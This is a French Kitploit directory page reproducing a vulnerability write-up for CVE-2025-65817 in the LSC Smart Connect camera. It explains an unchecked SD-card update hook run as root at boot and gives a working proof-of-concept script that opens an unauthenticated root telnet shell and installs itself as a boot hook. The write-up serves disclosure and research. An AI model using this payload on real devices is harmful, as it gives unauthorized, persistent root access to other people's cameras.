Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-65817 — Voici la CVE-2025-65817 | Kitploit
Outils/GitHubGitHub/istaarkk/cve-2025-65817
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationSécurité Matériel et IoTOutil d'Accès à Distance
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

Voici la CVE-2025-65817

Voir le dépôt
9il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-65817


ChampsValeur
TitreRapport de vulnérabilité : LSC Smart Connect Camera
Date2024-02-15
DescriptionExploitation du hook de mise à jour de la carte SD pour lancer des shells distants sur les caméras LSC Smart Connect.
Étiquettesiot, vulnérabilité, cve
Firmware1.14.13

Rapport de vulnérabilité de la caméra LSC Smart Connect

La vulnérabilité trouvée consiste à exploiter le système de mise à jour dans start_app.sh, plus précisément via le montage de la carte SD et le fichier update.nor.sh.

Variables de configuration

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

La section local/sbin/start_app.sh:50–99 fait aveuglément confiance à tout fichier nommé update.nor.sh situé sur la carte SD. Pendant le processus de démarrage, le script :

  • monte la carte SD,
  • copie update.nor.sh vers /tmp/update.nor.sh,
  • n'effectue aucune validation de son contenu, de son intégrité, de ses permissions ou de son propriétaire.

Plus tard dans la séquence de démarrage (local/sbin/start_app.sh:108–129), le fichier copié est :

  • marqué comme exécutable,
  • exécuté en tant que root,
  • exécuté avec le point de montage de la carte SD passé en argument.

Cette exécution a lieu avant le démarrage du ipc_service principal, ce qui signifie que le script s'exécute dans un environnement à privilèges maximaux où les utilitaires réseau, les fonctions de watchdog et les assistants de mise à jour sont déjà disponibles.

Utilitaires disponibles

L'exploit consiste à créer un shell et à ouvrir un port via telnetd, qui est présent sur la caméra :

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

Preuve de concept

Il suffit d'écrire un script .sh sur la carte SD et de le nommer update.nor.sh.

L'exploit que j'ai choisi est :

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

Nous confirmons que le port est ouvert.

alt text

Nous nous connectons via telnet :

alt text

Télécharger l’outil